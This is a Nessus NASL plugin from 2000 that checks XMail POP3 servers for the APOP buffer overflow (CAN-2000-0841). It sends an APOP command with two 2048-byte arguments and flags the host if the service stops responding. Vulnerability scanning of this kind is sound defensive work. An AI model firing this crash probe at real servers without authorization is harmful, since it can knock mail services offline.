1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91
|
#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#
if(description)
{
script_id(10559);
script_cve_id("CAN-2000-0841");
name["english"] = "XMail APOP Overflow";
name["francais"] = "Dpassement de buffer APOP dans XMail";
script_name(english:name["english"], francais:name["francais"]);
desc["english"] = "The remote POP3 server seems
to be subject to a buffer overflow when it receives
two too long arguments to the APOP command.
This problem may allow an attacker to disable this
pop server or to execute arbitrary code on this
host.
Solution : Contact your vendor for a patch
Risk factor : High";
desc["francais"] = "
Le serveur POP3 distant semble etre vulnrable un problme
de dpassement de buffer lorsqu'il recoit deux arguments trop longs
la commande APOP.
Ce problmez peut permettre un pirate d'executer du code
arbitraire sur ce serveur ou bien de dsactiver le serveur POP
distance.
Solution : Contactez votre vendeur pour un patch
Facteur de risque : Elev";
script_description(english:desc["english"], francais:desc["francais"]);
summary["english"] = "Attempts to overflow the APOP command";
summary["francais"] = "Essaye de trop remplir les buffers de la commande APOP";
script_summary(english:summary["english"], francais:summary["francais"]);
script_category(ACT_DENIAL);
script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
family["english"] = "Gain root remotely";
family["francais"] = "Passer root distance";
script_family(english:family["english"], francais:family["francais"]);
script_dependencie("find_service.nes", "qpopper.nasl");
script_exclude_keys("pop3/false_pop3");
script_require_ports("Services/pop3", 110);
exit(0);
}
#
# The script code starts here
#
fake = get_kb_item("pop3/false_pop3");
if(fake)exit(0);
port = get_kb_item("Services/pop3");
if(!port)port = 110;
if(get_port_state(port))
{
soc = open_sock_tcp(port);
if(soc)
{
d = recv_line(socket:soc, length:1024);
if(!d){close(soc);exit(0);}
c = string("APOP ", crap(2048), " ", crap(2048), "\r\n");
send(socket:soc, data:c);
r = recv_line(socket:soc, length:1024);
if(!r){
security_hole(port);
exit(0);
}
close(soc);
soc = open_sock_tcp(port);
if(!soc)security_hole(port);
else {
r = recv_line(socket:soc, length:1024);
if(!r)security_hole(port);
close(soc);
}
}
}
|